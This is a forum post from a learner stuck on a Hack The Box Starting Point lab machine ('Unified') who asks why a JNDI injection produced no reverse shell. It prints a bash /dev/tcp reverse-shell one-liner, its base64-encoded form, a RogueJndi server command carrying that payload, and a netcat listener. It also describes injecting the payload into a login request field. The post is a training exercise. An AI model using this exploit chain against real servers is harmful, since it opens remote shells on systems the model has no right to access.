I am stuck on the Unified machine in Tier 2 of Starting Point. I can't seem to get a reverse shell for the life of me!
After a few testing steps with tcpdump and playing around with the command that I don't think I need to elaborate on here, I tried to exploit the machine in the same way that the guide I followed told me to.
I encoded the bash reverse shell into base64, using this command:
┌──(kali㉿kali)-[~]
└─$ echo 'bash -c bash -i >&/dev/tcp/10.10.14.196/4444 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMTk2LzQ0NDQgMD4mMQo=
I set up a rogue-jndi server like this, with that reverse shell:
┌──(kali㉿kali)-[~]
└─$ java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMTk2LzQ0NDQgMD4mMQo=}|{base64,-d}|{bash,-i}" --hostname "10.10.14.196"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10.10.14.196:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10.10.14.196:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.196:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.196:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://10.10.14.196:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.196:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.196:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.196:1389/o=reference to artsploit.controllers.RemoteReference
After setting up the server, I created the netcat listener:
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
Finally, I sent the command in the remember section of the POST request in Burp Suite, and I got back the api.err.InvalidPayload message, which confirmed the machine was vulnerable.
When I checked back with netcat, there was no shell created.
PS: sorry if I'm misusing the forums lol, just lmk and I'll try to fix problems with my post, or tags or whatever.